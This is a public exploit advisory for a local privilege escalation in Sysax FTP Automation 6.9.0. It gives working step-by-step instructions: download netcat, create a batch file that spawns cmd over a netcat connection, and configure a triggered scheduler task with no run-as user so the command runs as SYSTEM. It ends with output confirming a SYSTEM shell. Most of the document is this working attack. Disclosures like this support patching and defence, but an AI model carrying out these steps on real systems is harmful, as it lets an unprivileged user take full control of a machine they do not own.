Sysax FTP Automation 6.9.0 Privilege Escalation

2022.03.22
Credit: bzyo
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Author: bzyo (@bzyo_) # Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation # Date: 03-20-2022 # Vulnerable Software: Sysax FTP Automation 6.9.0 # Vendor Homepage: https://www.sysax.com/ # Version: 6.9.0 # Software Link: https://www.sysax.com/download/sysaxauto_setup.msi # Tested on: Windows 10 x64 # Details: Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system. # Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account # Exploit: Logged in as low privileged account 1. Create folder c:\temp 2. Download netcat (nc.exe) to c:\temp 3. Create file 'pwn.bat' in c:\temp with contents c:\temp\nc.exe localhost 1337 -e cmd 4. Open command prompt and netcat listener nc -nlvvp 1337 5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation 6. Select Setup Scheduled/Triggered Tasks - Add task (Triggered) - Update folder to monitor to be c:\temp - Check 'Run task if a file is added to the monitor folder or subfolder(s)' - Choose 'Run any other Program' and choose c:\temp\pwn.bat - Uncheck 'Login as the following user to run task' - Finish and Save 7. Create new text file in c:\temp 8. Check netcat listener C:\WINDOWS\system32>whoami whoami nt authority\system


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top